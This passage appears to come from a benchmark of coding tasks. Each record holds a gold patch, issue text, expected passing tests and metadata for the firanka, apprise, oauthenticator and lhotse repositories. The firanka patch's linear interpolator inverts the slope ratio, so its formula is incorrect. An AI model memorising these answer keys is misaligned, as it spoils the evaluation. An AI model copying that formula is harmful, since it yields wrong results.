+ ),
+ messages.playbook_run_completed(
+ "play_id",
+ constants.RESULT_FAILURE,
),
- messages.playbook_run_completed("play_id", constants.RESULT_FAILURE,),
],
FakeLogger()
.info("Playbook run play_id running as job invocation 123")
|
Implement v2 playbook_run_finished
[response] run playbook finished
This message is sent for each host individually when a Playbook execution on a given host finishes.
```
{
"type": "playbook_run_finished",
// id of the remediation execution
"playbook_run_id": "a30f1d7c-ba75-465b-a217-63f3f553836f",
"host": "01.example.com",
"status": "success" || "failure" || "canceled",
"version": 2,
"connection_code": 0 (success) || 1 (error),
"execution_code": 0 (success) || number (return code from ansible) || null (in case connection code is 1)
}
```
[response] run playbook finished ad1
https://bugzilla.redhat.com/show_bug.cgi?id=1833039
RHCLOUD-5370
There are certain failure situations that we know may happen (e.g. "This host is not known by Satellite"). Currently there is no way for sat-receptor to indicate these other than adding the error message to the "console" text field.
We should introduce a code/error field with well-defined values so that Remediations can understand the semantics of what the problem was without having to parse the text field.
Extend playbook_run_finished
We can add a second type of failure:
- Satellite can’t reach host
- Satellite connected, but the run failed (e.g. problem in ansible playbook)
|
0.0
|
9c636515c06c01246641abbf4e786888d050fa9b
|
[
"tests/test_response_queue.py::test_playbook_run_completed[playbook_run_completed_scenario0]",
"tests/test_response_queue.py::test_playbook_run_completed[playbook_run_completed_scenario1]",
"tests/test_response_queue.py::test_playbook_run_completed[playbook_run_completed_scenario2]",
"tests/test_response_queue.py::test_playbook_run_completed[playbook_run_completed_scenario3]",
"tests/test_response_queue.py::test_playbook_run_completed[playbook_run_completed_scenario4]",
"tests/test_run.py::test_mark_as_failed",
"tests/test_run.py::test_poll_with_retries[poll_with_retries_scenario0]",
"tests/test_run.py::test_poll_with_retries[poll_with_retries_scenario1]",
"tests/test_run.py::test_polling_loop[polling_loop_scenario0]",
"tests/test_run.py::test_polling_loop[polling_loop_scenario1]",
"tests/test_run.py::test_polling_loop[polling_loop_scenario2]",
"tests/test_run.py::test_polling_loop[polling_loop_scenario3]",
"tests/test_run.py::test_polling_loop[polling_loop_scenario4]",
"tests/test_run.py::test_polling_loop[polling_loop_scenario5]",
"tests/test_run.py::test_hostname_sanity",
"tests/test_run.py::test_start[start_scenario0]",
"tests/test_run.py::test_start[start_scenario1]",
"tests/test_run.py::test_start[start_scenario2]",
"tests/test_run.py::test_start[start_scenario3]"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-09-18 10:31:11+00:00
|
apache-2.0
| 4,682
|
|
smok-serwis__firanka-2
|
diff --git a/README.md b/README.md
index c71f28c..f14d95a 100644
--- a/README.md
+++ b/README.md
@@ -98,6 +98,17 @@ By definition, _ModuloSeries_ has the domain of all real numbers.
Note that someOtherSeries's domain length must be non-zero and finite. Otherwise
_ValueError_ will be thrown.
+## LinearInterpolationSeries
+
+These are discretes, but allow you to define an operator that will
+take its neighbours into account and let you return a custom value.
+
+By default, it will assumes that values can be added, subbed, multed and dived,
+and will do classical linear interpolation.
+
+They can either utilize an existing discrete series, or be created just as
+any other discrete series would be.
+
## Ranges
Can be imported from _sai.ranges_.
@@ -111,9 +122,7 @@ You can create Ranges as follows:
Range(-5, 5, True, False) == Range('<-5;5)')
```
-First boolean argument signifies whether the interval is left-closed,
-and second whether it is right-closed.
-
+For more information [use the source](firanka/ranges.py#L33)
Range's are immutable and hashable. They can be sliced:
```python
@@ -134,3 +143,8 @@ Or you can check for strict inclusion
Range('<-1;1>') in Range('<-2;2>')
```
+## TimeProviders
+
+**EXPERIMENTAL**
+
+Can be imported from _sai.timeproviders_.
diff --git a/firanka/ranges.py b/firanka/ranges.py
index a2b2ae1..3e06c1e 100644
--- a/firanka/ranges.py
+++ b/firanka/ranges.py
@@ -1,9 +1,11 @@
# coding=UTF-8
from __future__ import print_function, absolute_import, division
-import six
+
import functools
import math
+import six
+
__all__ = [
'Range',
'REAL_SET',
@@ -31,6 +33,16 @@ class Range(object):
self.right_inc)
def __init__(self, *args):
+ """
+ Create like:
+
+ * Range('<a;b>')
+ * Range(a, b, is_left_closed_, is_right_closed)
+ * Range(a, b) - will have both sides closed, unless one is inf
+ * Range(slice(a, b)) - will have both sides closed, unless one is None
+
+ :param args:
+ """
if len(args) == 1:
rs, = args
if isinstance(rs, type(self)):
@@ -48,6 +60,10 @@ class Range(object):
start, stop = rs[1:-1].split(';')
args = float(start), float(stop), rs[0] == '<', rs[-1] == '>'
+ elif len(args) == 2:
+ args = args[0], args[1], not math.isinf(args[0]), not math.isinf(
+ args[1])
+
q = lambda a, b, args: args[a] and math.isinf(args[b])
if q(2, 0, args) or q(3, 1, args):
@@ -65,7 +81,7 @@ class Range(object):
if isinstance(x, Range):
if ((x.start == self.start) and (x.left_inc ^ self.left_inc)) \
or ((x.stop == self.stop) and (
- x.right_inc ^ self.right_inc)):
+ x.right_inc ^ self.right_inc)):
return False
return (x.start >= self.start) and (x.stop <= self.stop)
@@ -80,15 +96,15 @@ class Range(object):
def is_empty(self):
return (self.start == self.stop) and not (
- self.left_inc or self.right_inc)
+ self.left_inc or self.right_inc)
def length(self):
return self.stop - self.start
def __repr__(self):
return 'Range(%s, %s, %s, %s)' % (
- repr(self.start), repr(self.stop), repr(self.left_inc),
- repr(self.right_inc))
+ repr(self.start), repr(self.stop), repr(self.left_inc),
+ repr(self.right_inc))
def __getitem__(self, item):
if not isinstance(item, slice):
diff --git a/firanka/series/__init__.py b/firanka/series/__init__.py
new file mode 100644
index 0000000..f738011
--- /dev/null
+++ b/firanka/series/__init__.py
@@ -0,0 +1,16 @@
+# coding=UTF-8
+from __future__ import absolute_import
+
+from .base import FunctionSeries, DiscreteSeries, Series
+from .interpolations import LinearInterpolationSeries, \
+ SCALAR_LINEAR_INTERPOLATOR
+from .modulo import ModuloSeries
+
+__all__ = [
+ 'FunctionSeries',
+ 'DiscreteSeries',
+ 'ModuloSeries',
+ 'Series',
+ 'SCALAR_LINEAR_INTERPOLATOR',
+ 'LinearInterpolationSeries',
+]
diff --git a/firanka/series.py b/firanka/series/base.py
similarity index 88%
rename from firanka/series.py
rename to firanka/series/base.py
index c1bb0cc..6182ce0 100644
--- a/firanka/series.py
+++ b/firanka/series/base.py
@@ -1,19 +1,10 @@
# coding=UTF-8
from __future__ import print_function, absolute_import, division
-import math
-
import six
from firanka.exceptions import NotInDomainError
-from firanka.ranges import Range, REAL_SET, EMPTY_SET
-
-__all__ = [
- 'FunctionSeries',
- 'DiscreteSeries',
- 'ModuloSeries',
- 'Series',
-]
+from firanka.ranges import Range, EMPTY_SET
class Series(object):
@@ -286,31 +277,3 @@ class JoinedSeries(Series):
def _get_for(self, item):
return self.op(self.ser1._get_for(item), self.ser2._get_for(item))
-
-
-class ModuloSeries(Series):
- def __init__(self, series, *args, **kwargs):
- """
- Construct a modulo series
- :param series: base series to use
- :raise ValueError: invalid domain length
- """
- super(ModuloSeries, self).__init__(REAL_SET, *args, **kwargs)
-
- self.series = series
- self.period = self.series.domain.length()
-
- if self.period == 0:
- raise ValueError('Modulo series cannot have a period of 0')
- elif math.isinf(self.period):
- raise ValueError('Modulo series cannot have an infinite period')
-
- def _get_for(self, item):
- if item < 0:
- item = -(item // self.period) * self.period + item
- elif item > self.period:
- item = item - (item // self.period) * self.period
- elif item == self.period:
- item = 0
-
- return self.series._get_for(self.series.domain.start + item)
diff --git a/firanka/series/interpolations.py b/firanka/series/interpolations.py
new file mode 100644
index 0000000..178c0ff
--- /dev/null
+++ b/firanka/series/interpolations.py
@@ -0,0 +1,49 @@
+# coding=UTF-8
+from __future__ import print_function, absolute_import, division
+
+import six
+
+from .base import DiscreteSeries, Series
+
+
+def SCALAR_LINEAR_INTERPOLATOR(t0, v0, t1, v1, tt):
+ """
+ Good intepolator if our values can be added, subtracted, multiplied and divided
+ """
+ return v0 + (tt - t0) * (t1 - t0) / (v1 - v0)
+
+
+class LinearInterpolationSeries(DiscreteSeries):
+ def __init__(self, data, domain=None,
+ interpolator=SCALAR_LINEAR_INTERPOLATOR,
+ *args, **kwargs):
+ """
+ :param interpolator: callable(t0: float, v0: any, t1: float, v1: any, tt: float) -> any
+ This, given intepolation points (t0, v0) and (t1, v1) such that t0 <= tt <= t1,
+ return a value for index tt
+ :raise TypeError: a non-discrete series was passed as data
+ """
+ self.interpolator = interpolator
+ if isinstance(data, DiscreteSeries):
+ data, domain = data.data, data.domain
+ elif isinstance(data, Series):
+ raise TypeError('non-discrete series not supported!')
+
+ super(LinearInterpolationSeries, self).__init__(data, domain, *args,
+ **kwargs)
+
+ def _get_for(self, item):
+ if item == self.domain.start:
+ return self.data[0][1]
+
+ if len(self.data) == 1:
+ return super(LinearInterpolationSeries, self).__getitem__(item)
+
+ for i in six.moves.range(0, len(self.data) - 1):
+ cur_i, cur_v = self.data[i]
+ next_i, next_v = self.data[i + 1]
+
+ if cur_i <= item <= next_i:
+ return self.interpolator(cur_i, cur_v, next_i, next_v, item)
+
+ return self.data[-1][1]
diff --git a/firanka/series/modulo.py b/firanka/series/modulo.py
new file mode 100644
index 0000000..ed72808
--- /dev/null
+++ b/firanka/series/modulo.py
@@ -0,0 +1,35 @@
+# coding=UTF-8
+from __future__ import print_function, absolute_import, division
+
+import math
+
+from .base import Series
+from ..ranges import REAL_SET
+
+
+class ModuloSeries(Series):
+ def __init__(self, series, *args, **kwargs):
+ """
+ Construct a modulo series
+ :param series: base series to use
+ :raise ValueError: invalid domain length
+ """
+ super(ModuloSeries, self).__init__(REAL_SET, *args, **kwargs)
+
+ self.series = series
+ self.period = self.series.domain.length()
+
+ if self.period == 0:
+ raise ValueError('Modulo series cannot have a period of 0')
+ elif math.isinf(self.period):
+ raise ValueError('Modulo series cannot have an infinite period')
+
+ def _get_for(self, item):
+ if item < 0:
+ item = -(item // self.period) * self.period + item
+ elif item > self.period:
+ item = item - (item // self.period) * self.period
+ elif item == self.period:
+ item = 0
+
+ return self.series._get_for(self.series.domain.start + item)
diff --git a/firanka/timeproviders.py b/firanka/timeproviders.py
index 2cca5f4..47dbd0c 100644
--- a/firanka/timeproviders.py
+++ b/firanka/timeproviders.py
@@ -1,10 +1,8 @@
# coding=UTF-8
from __future__ import print_function, absolute_import, division
-import six
-import logging
-from .series import Series
from .ranges import Range
+from .series import Series
class BijectionMapping(object):
|
smok-serwis/firanka
|
5888250487fd93c5251a0dfafd6173895e599550
|
diff --git a/tests/test_range.py b/tests/test_range.py
index 5463f90..c8bc935 100644
--- a/tests/test_range.py
+++ b/tests/test_range.py
@@ -1,6 +1,8 @@
# coding=UTF-8
from __future__ import print_function, absolute_import, division
+
import unittest
+
from firanka.ranges import Range
@@ -38,7 +40,7 @@ class TestRange(unittest.TestCase):
def test_str_and_repr_and_bool(self):
p = Range(-1, 1, True, True)
self.assertEqual(eval(repr(p)), p)
- self.assertEqual(str(Range(-1, 1, True, True)), '<-1;1>')
+ self.assertEqual(str(Range(-1, 1)), '<-1;1>')
def test_constructor(self):
self.assertRaises(ValueError, lambda: Range('#2;3>'))
diff --git a/tests/test_series.py b/tests/test_series.py
index 8b8a022..94d73bc 100644
--- a/tests/test_series.py
+++ b/tests/test_series.py
@@ -1,11 +1,13 @@
# coding=UTF-8
from __future__ import print_function, absolute_import, division
-import six
+
import math
import unittest
-from firanka.series import DiscreteSeries, FunctionSeries, ModuloSeries
-from firanka.ranges import Range
+
from firanka.exceptions import NotInDomainError
+from firanka.ranges import Range
+from firanka.series import DiscreteSeries, FunctionSeries, ModuloSeries, \
+ LinearInterpolationSeries
NOOP = lambda x: x
@@ -174,3 +176,18 @@ class TestModuloSeries(unittest.TestCase):
ser2 = FunctionSeries(NOOP, '<0;3)')
ser3 = ser1.join(ser2, lambda x, y: x * y)
+
+
+class TestLinearInterpolation(unittest.TestCase):
+ def test_lin(self):
+ series = LinearInterpolationSeries(
+ DiscreteSeries([(0, 1), (1, 2), (2, 3)], '<0;3)'))
+
+ self.assertEqual(series[0], 1)
+ self.assertEqual(series[0.5], 1.5)
+ self.assertEqual(series[1], 2)
+ self.assertEqual(series[2.3], 3)
+
+ def test_conf(self):
+ self.assertRaises(TypeError, lambda: LinearInterpolationSeries(
+ FunctionSeries(NOOP, '<0;3)')))
diff --git a/tests/test_timeproviders.py b/tests/test_timeproviders.py
index d6d0d78..87bc595 100644
--- a/tests/test_timeproviders.py
+++ b/tests/test_timeproviders.py
@@ -1,6 +1,6 @@
# coding=UTF-8
from __future__ import print_function, absolute_import, division
-import six
+
import unittest
from firanka.series import DiscreteSeries
|
Add a linear interpolation series
Much like `DiscreteSeries` but can perform linear interpolation
|
0.0
|
5888250487fd93c5251a0dfafd6173895e599550
|
[
"tests/test_range.py::TestRange::test_constructor",
"tests/test_range.py::TestRange::test_contains",
"tests/test_range.py::TestRange::test_intersection",
"tests/test_range.py::TestRange::test_isempty",
"tests/test_range.py::TestRange::test_slicing",
"tests/test_range.py::TestRange::test_str_and_repr_and_bool",
"tests/test_series.py::TestDiscreteSeries::test_apply",
"tests/test_series.py::TestDiscreteSeries::test_base",
"tests/test_series.py::TestDiscreteSeries::test_discretize",
"tests/test_series.py::TestDiscreteSeries::test_eval",
"tests/test_series.py::TestDiscreteSeries::test_eval2",
"tests/test_series.py::TestDiscreteSeries::test_eval3",
"tests/test_series.py::TestDiscreteSeries::test_slice",
"tests/test_series.py::TestDiscreteSeries::test_slice_outdomain",
"tests/test_series.py::TestDiscreteSeries::test_translation",
"tests/test_series.py::TestDiscreteSeries::test_uncov",
"tests/test_series.py::TestFunctionSeries::test_apply",
"tests/test_series.py::TestFunctionSeries::test_domain_sensitivity",
"tests/test_series.py::TestFunctionSeries::test_slice",
"tests/test_series.py::TestModuloSeries::test_base",
"tests/test_series.py::TestModuloSeries::test_comp_discrete",
"tests/test_series.py::TestModuloSeries::test_exceptions",
"tests/test_series.py::TestLinearInterpolation::test_conf",
"tests/test_series.py::TestLinearInterpolation::test_lin",
"tests/test_timeproviders.py::TestTimeproviders::test_base"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_added_files",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-12-09 07:47:03+00:00
|
mit
| 5,569
|
|
caronc__apprise-324
|
diff --git a/.gitignore b/.gitignore
index 11f190a..0315c5b 100644
--- a/.gitignore
+++ b/.gitignore
@@ -67,3 +67,8 @@ target/
#PyCharm
.idea
+
+#PyDev (Eclipse)
+.project
+.pydevproject
+.settings
diff --git a/apprise/utils.py b/apprise/utils.py
index 21f2c49..4b4833b 100644
--- a/apprise/utils.py
+++ b/apprise/utils.py
@@ -120,9 +120,9 @@ GET_EMAIL_RE = re.compile(
r'(?P<email>(?P<userid>[a-z0-9$%=_~-]+'
r'(?:\.[a-z0-9$%+=_~-]+)'
r'*)@(?P<domain>('
- r'(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+'
- r'[a-z0-9](?:[a-z0-9-]*[a-z0-9]))|'
- r'[a-z0-9][a-z0-9-]{5,})))'
+ r'(?:[a-z0-9](?:[a-z0-9_-]*[a-z0-9])?\.)+'
+ r'[a-z0-9](?:[a-z0-9_-]*[a-z0-9]))|'
+ r'[a-z0-9][a-z0-9_-]{5,})))'
r'\s*>?', re.IGNORECASE)
# Regular expression used to extract a phone number
@@ -232,9 +232,12 @@ def is_hostname(hostname, ipv4=True, ipv6=True):
# - Hostnames can only be comprised of alpha-numeric characters and the
# hyphen (-) character.
# - Hostnames can not start with the hyphen (-) character.
+ # - as a workaround for https://github.com/docker/compose/issues/229, to
+ #   be able to address services in other stacks, we also allow
+ #   underscores in hostnames
# - labels can not exceed 63 characters
allowed = re.compile(
- r'(?!-)[a-z0-9][a-z0-9-]{1,62}(?<!-)$',
+ r'^[a-z0-9][a-z0-9_-]{1,62}(?<!-)$',
re.IGNORECASE,
)
|
caronc/apprise
|
2c2722f61f9f983827c8246943f0462098e5a0ed
|
diff --git a/test/test_utils.py b/test/test_utils.py
index b187da0..37c2ba7 100644
--- a/test/test_utils.py
+++ b/test/test_utils.py
@@ -532,6 +532,8 @@ def test_is_hostname():
assert utils.is_hostname('yahoo.ca.') == 'yahoo.ca'
assert utils.is_hostname('valid-dashes-in-host.ca') == \
'valid-dashes-in-host.ca'
+ assert utils.is_hostname('valid-underscores_in_host.ca') == \
+ 'valid-underscores_in_host.ca'
# Invalid Hostnames
assert utils.is_hostname('-hostname.that.starts.with.a.dash') is False
@@ -539,7 +541,6 @@ def test_is_hostname():
assert utils.is_hostname(' spaces ') is False
assert utils.is_hostname(' ') is False
assert utils.is_hostname('') is False
- assert utils.is_hostname('valid-underscores_in_host.ca') is False
# Valid IPv4 Addresses
assert utils.is_hostname('127.0.0.1') == '127.0.0.1'
@@ -625,6 +626,14 @@ def test_is_email():
assert 'test' == results['user']
assert '' == results['label']
+ results = utils.is_email('test@my-valid_host.com')
+ assert '' == results['name']
+ assert 'test@my-valid_host.com' == results['email']
+ assert 'test@my-valid_host.com' == results['full_email']
+ assert 'my-valid_host.com' == results['domain']
+ assert 'test' == results['user']
+ assert '' == results['label']
+
results = utils.is_email('tag+test@gmail.com')
assert '' == results['name']
assert 'test@gmail.com' == results['email']
|
'Unparseable E-Mail URL' error for hostnames containing underscore
With underscore:
```bash
$ docker run --rm caronc/apprise:latest /usr/local/bin/apprise --body='hello world' \
'mailto://smtp_service:25/?from=foo@localhost&to=bar@localhost'
2020-11-22 16:33:16,297 - ERROR - Unparseable E-Mail URL mailto://smtp_service:25/?from=foo@localhost&to=bar@localhost
2020-11-22 16:33:16,297 - ERROR - You must specify at least one server URL or populated configuration file.
```
Without underscore:
```bash
$ docker run --rm caronc/apprise:latest /usr/local/bin/apprise --body='hello world' \
'mailto://smtpservice:25/?from=foo@localhost&to=bar@localhost'
2020-11-22 16:34:12,541 - INFO - Notifying 1 service(s) asynchronously.
```
Underscores in hostnames are completely legal, see https://stackoverflow.com/a/2183140/5116073
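As a quick illustration, the relaxed per-label pattern from the patch above accepts such hostnames; this is only a sketch of the regular expression itself, not the full `is_hostname()` helper:

```python
import re

# Per-label pattern from the patched is_hostname() above.
allowed = re.compile(r'^[a-z0-9][a-z0-9_-]{1,62}(?<!-)$', re.IGNORECASE)

# is_hostname() checks each dot-separated label individually.
assert all(allowed.match(label) for label in 'smtp_service'.split('.'))
assert all(allowed.match(label) for label in 'valid-underscores_in_host.ca'.split('.'))
assert not allowed.match('-starts-with-a-dash')
```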
|
0.0
|
2c2722f61f9f983827c8246943f0462098e5a0ed
|
[
"test/test_utils.py::test_is_hostname",
"test/test_utils.py::test_is_email"
] |
[
"test/test_utils.py::test_parse_qsd",
"test/test_utils.py::test_parse_url",
"test/test_utils.py::test_parse_bool",
"test/test_utils.py::test_is_ipaddr",
"test/test_utils.py::test_parse_emails",
"test/test_utils.py::test_parse_urls",
"test/test_utils.py::test_parse_list",
"test/test_utils.py::test_exclusive_match",
"test/test_utils.py::test_apprise_validate_regex",
"test/test_utils.py::test_environ_temporary_change",
"test/test_utils.py::test_apply_templating"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-11-22 17:34:28+00:00
|
mit
| 1,504
|
|
jupyterhub__oauthenticator-449
|
diff --git a/docs/source/github.md b/docs/source/github.md
index d5e2663..170b51e 100644
--- a/docs/source/github.md
+++ b/docs/source/github.md
@@ -39,3 +39,33 @@ To use this expanded user information, you will need to subclass your
current spawner and modify the subclass to read these fields from
`auth_state` and then use this information to provision your Notebook or
Lab user.
+
+## Restricting access
+
+### Organizations
+
+If you would like to restrict access to members of specific GitHub organizations
+you can pass a list of organization names to `allowed_organizations`.
+
+For example, the below will ensure that only members of `org_a` or
+`org_b` will be authorized to access.
+
+`c.GitHubOAuthenticator.allowed_organizations = ["org_a", "org_b"]`
+
+### Teams
+
+It is also possible to restrict access to members of specific teams within
+organizations using the syntax: `<organization>:<team-name>`.
+
+For example, the below will only allow members of `org_a`, or
+`team_1` in `org_b` access. Members of `org_b` but not `team_1` will be
+unauthorized to access.
+
+`c.GitHubOAuthenticator.allowed_organizations = ["org_a", "org_b:team_1"]`
+
+### Notes
+
+- Restricting access by either organization or team requires the `read:org`
+ scope
+- Ensure you use the organization/team name as it appears in the GitHub url
+ - E.g. Use `jupyter` instead of `Project Jupyter`
diff --git a/oauthenticator/github.py b/oauthenticator/github.py
index e29777d..9526b1f 100644
--- a/oauthenticator/github.py
+++ b/oauthenticator/github.py
@@ -225,13 +225,13 @@ class GitHubOAuthenticator(OAuthenticator):
headers = _api_headers(access_token)
# Check membership of user `username` for organization `org` via api [check-membership](https://developer.github.com/v3/orgs/members/#check-membership)
# With empty scope (even if authenticated by an org member), this
- # will only await public org members. You want 'read:org' in order
- # to be able to iterate through all members.
- check_membership_url = "%s/orgs/%s/members/%s" % (
- self.github_api,
- org,
- username,
- )
+ # will only await public org members. You want 'read:org' in order
+ # to be able to iterate through all members. If you would only like to
+ # allow certain teams within an organization, specify
+ # allowed_organizations = ["org_name:team_name"]
+
+ check_membership_url = self._build_check_membership_url(org, username)
+
req = HTTPRequest(
check_membership_url,
method="GET",
@@ -260,6 +260,13 @@ class GitHubOAuthenticator(OAuthenticator):
)
return False
+ def _build_check_membership_url(self, org: str, username: str) -> str:
+ if ":" in org:
+ org, team = org.split(":")
+ return f"{self.github_api}/orgs/{org}/teams/{team}/members/{username}"
+ else:
+ return f"{self.github_api}/orgs/{org}/members/{username}"
+
class LocalGitHubOAuthenticator(LocalAuthenticator, GitHubOAuthenticator):
|
jupyterhub/oauthenticator
|
d8ea0b6f11dbc3dac35aada9d17aef6ccd2da6a4
|
diff --git a/oauthenticator/tests/test_github.py b/oauthenticator/tests/test_github.py
index 0211cd4..16c04c9 100644
--- a/oauthenticator/tests/test_github.py
+++ b/oauthenticator/tests/test_github.py
@@ -7,6 +7,7 @@ from urllib.parse import parse_qs
from urllib.parse import urlparse
from pytest import fixture
+from pytest import mark
from tornado.httpclient import HTTPResponse
from tornado.httputil import HTTPHeaders
from traitlets.config import Config
@@ -71,40 +72,42 @@ async def test_allowed_org_membership(github_client):
## Mock Github API
- teams = {
+ orgs = {
'red': ['grif', 'simmons', 'donut', 'sarge', 'lopez'],
'blue': ['tucker', 'caboose', 'burns', 'sheila', 'texas'],
}
+ org_teams = {'blue': {'alpha': ['tucker', 'caboose', 'burns']}}
+
member_regex = re.compile(r'/orgs/(.*)/members')
- def team_members(paginate, request):
+ def org_members(paginate, request):
urlinfo = urlparse(request.url)
- team = member_regex.match(urlinfo.path).group(1)
+ org = member_regex.match(urlinfo.path).group(1)
- if team not in teams:
+ if org not in orgs:
return HTTPResponse(request, 404)
if not paginate:
- return [user_model(m) for m in teams[team]]
+ return [user_model(m) for m in orgs[org]]
else:
page = parse_qs(urlinfo.query).get('page', ['1'])
page = int(page[0])
- return team_members_paginated(
- team, page, urlinfo, functools.partial(HTTPResponse, request)
+ return org_members_paginated(
+ org, page, urlinfo, functools.partial(HTTPResponse, request)
)
- def team_members_paginated(team, page, urlinfo, response):
- if page < len(teams[team]):
+ def org_members_paginated(org, page, urlinfo, response):
+ if page < len(orgs[org]):
headers = make_link_header(urlinfo, page + 1)
- elif page == len(teams[team]):
+ elif page == len(orgs[org]):
headers = {}
else:
return response(400)
headers.update({'Content-Type': 'application/json'})
- ret = [user_model(teams[team][page - 1])]
+ ret = [user_model(orgs[org][page - 1])]
return response(
200,
@@ -112,19 +115,42 @@ async def test_allowed_org_membership(github_client):
buffer=BytesIO(json.dumps(ret).encode('utf-8')),
)
- membership_regex = re.compile(r'/orgs/(.*)/members/(.*)')
+ org_membership_regex = re.compile(r'/orgs/(.*)/members/(.*)')
- def team_membership(request):
+ def org_membership(request):
urlinfo = urlparse(request.url)
- urlmatch = membership_regex.match(urlinfo.path)
- team = urlmatch.group(1)
+ urlmatch = org_membership_regex.match(urlinfo.path)
+ org = urlmatch.group(1)
username = urlmatch.group(2)
- print('Request team = %s, username = %s' % (team, username))
- if team not in teams:
- print('Team not found: team = %s' % (team))
+ print('Request org = %s, username = %s' % (org, username))
+ if org not in orgs:
+ print('Org not found: org = %s' % (org))
+ return HTTPResponse(request, 404)
+ if username not in orgs[org]:
+ print('Member not found: org = %s, username = %s' % (org, username))
return HTTPResponse(request, 404)
- if username not in teams[team]:
- print('Member not found: team = %s, username = %s' % (team, username))
+ return HTTPResponse(request, 204)
+
+ team_membership_regex = re.compile(r'/orgs/(.*)/teams/(.*)/members/(.*)')
+
+ def team_membership(request):
+ urlinfo = urlparse(request.url)
+ urlmatch = team_membership_regex.match(urlinfo.path)
+ org = urlmatch.group(1)
+ team = urlmatch.group(2)
+ username = urlmatch.group(3)
+ print('Request org = %s, team = %s username = %s' % (org, team, username))
+ if org not in orgs:
+ print('Org not found: org = %s' % (org))
+ return HTTPResponse(request, 404)
+ if team not in org_teams[org]:
+ print('Team not found in org: team = %s, org = %s' % (team, org))
+ return HTTPResponse(request, 404)
+ if username not in org_teams[org][team]:
+ print(
+ 'Member not found: org = %s, team = %s, username = %s'
+ % (org, team, username)
+ )
return HTTPResponse(request, 404)
return HTTPResponse(request, 204)
@@ -132,8 +158,9 @@ async def test_allowed_org_membership(github_client):
for paginate in (False, True):
client_hosts = client.hosts['api.github.com']
- client_hosts.append((membership_regex, team_membership))
- client_hosts.append((member_regex, functools.partial(team_members, paginate)))
+ client_hosts.append((team_membership_regex, team_membership))
+ client_hosts.append((org_membership_regex, org_membership))
+ client_hosts.append((member_regex, functools.partial(org_members, paginate)))
authenticator.allowed_organizations = ['blue']
@@ -156,10 +183,42 @@ async def test_allowed_org_membership(github_client):
user = await authenticator.authenticate(handler)
assert user['name'] == 'donut'
+ # test team membership
+ authenticator.allowed_organizations = ['blue:alpha', 'red']
+
+ handler = client.handler_for_user(user_model('tucker'))
+ user = await authenticator.authenticate(handler)
+ assert user['name'] == 'tucker'
+
+ handler = client.handler_for_user(user_model('grif'))
+ user = await authenticator.authenticate(handler)
+ assert user['name'] == 'grif'
+
+ handler = client.handler_for_user(user_model('texas'))
+ user = await authenticator.authenticate(handler)
+ assert user is None
+
client_hosts.pop()
client_hosts.pop()
+@mark.parametrize(
+ "org, username, expected",
+ [
+ ("blue", "texas", "https://api.github.com/orgs/blue/members/texas"),
+ (
+ "blue:alpha",
+ "tucker",
+ "https://api.github.com/orgs/blue/teams/alpha/members/tucker",
+ ),
+ ("red", "grif", "https://api.github.com/orgs/red/members/grif"),
+ ],
+)
+def test_build_check_membership_url(org, username, expected):
+ output = GitHubOAuthenticator()._build_check_membership_url(org, username)
+ assert output == expected
+
+
def test_deprecated_config(caplog):
cfg = Config()
cfg.GitHubOAuthenticator.github_organization_whitelist = ["jupy"]
|
[GitHub] We can authorize organizations, but what about teams within them?
Currently GitHub authentication is set up to whitelist individual users or entire organizations:
https://github.com/jupyterhub/oauthenticator/blob/master/oauthenticator/github.py
See here for the implementation:
https://zero-to-jupyterhub.readthedocs.io/en/latest/authentication.html?highlight=auth#github
It would be great to be able to whitelist Teams within a given organization:
https://developer.github.com/v3/teams/members/#get-team-membership
We are currently creating many new organizations on github for week-long tutorials to grant time-limited access to hubs. Having team-based authentication could help with a few scenarios:
1) medium/large github organizations with application-specific hubs (https://github.com/pangeo-data)
2) could also be a really useful feature for resource access based on team membership within a hub (for example, mapping team name to group id)?
|
0.0
|
d8ea0b6f11dbc3dac35aada9d17aef6ccd2da6a4
|
[
"oauthenticator/tests/test_github.py::test_build_check_membership_url[blue-texas-https://api.github.com/orgs/blue/members/texas]",
"oauthenticator/tests/test_github.py::test_build_check_membership_url[blue:alpha-tucker-https://api.github.com/orgs/blue/teams/alpha/members/tucker]",
"oauthenticator/tests/test_github.py::test_build_check_membership_url[red-grif-https://api.github.com/orgs/red/members/grif]"
] |
[
"oauthenticator/tests/test_github.py::test_deprecated_config"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-08-04 15:03:45+00:00
|
bsd-3-clause
| 3,376
|
|
lhotse-speech__lhotse-724
|
diff --git a/lhotse/dataset/sampling/bucketing.py b/lhotse/dataset/sampling/bucketing.py
index 04541b37..a2ad7ba3 100644
--- a/lhotse/dataset/sampling/bucketing.py
+++ b/lhotse/dataset/sampling/bucketing.py
@@ -422,23 +422,55 @@ def _create_buckets_equal_duration_single(
"""
total_duration = np.sum(c.duration for c in cuts)
bucket_duration = total_duration / num_buckets
- iter_cuts = iter(cuts)
- buckets = []
- for bucket_idx in range(num_buckets):
- bucket = []
- current_duration = 0
- try:
- while current_duration < bucket_duration:
- bucket.append(next(iter_cuts))
- current_duration += bucket[-1].duration
- # Every odd bucket, take the cut that exceeded the bucket's duration
- # and put it in the front of the iterable, so that it goes to the
- # next bucket instead. It will ensure that the last bucket is not too
- # thin (otherwise all the previous buckets are a little too large).
- if bucket_idx % 2:
- last_cut = bucket.pop()
- iter_cuts = chain([last_cut], iter_cuts)
- except StopIteration:
- assert bucket_idx == num_buckets - 1
- buckets.append(CutSet.from_cuts(bucket))
+ # Define the order for adding cuts. We start at the beginning, then go to
+ # the end, and work our way to the middle. Once in the middle we distribute
+ # excess cuts among the two buckets close to the median duration. This
+ # handles the problem of where to place cuts that caused previous buckets
+ # to "over-flow" without sticking all of them in the last bucket, which
+ # causes one large bucket at the end and also places many small duration
+ # cuts with longer ones.
+ order = list(range(0, len(cuts), 2)) + list(
+ range(len(cuts) - (1 + len(cuts) % 2), 0, -2)
+ )
+ order2idx = {o_idx: i for i, o_idx in enumerate(order)}
+ durations = [c.duration for c in cuts]
+
+ # We need a list of the cut durations in the same order (0, N-1, 1, N-2, ...)
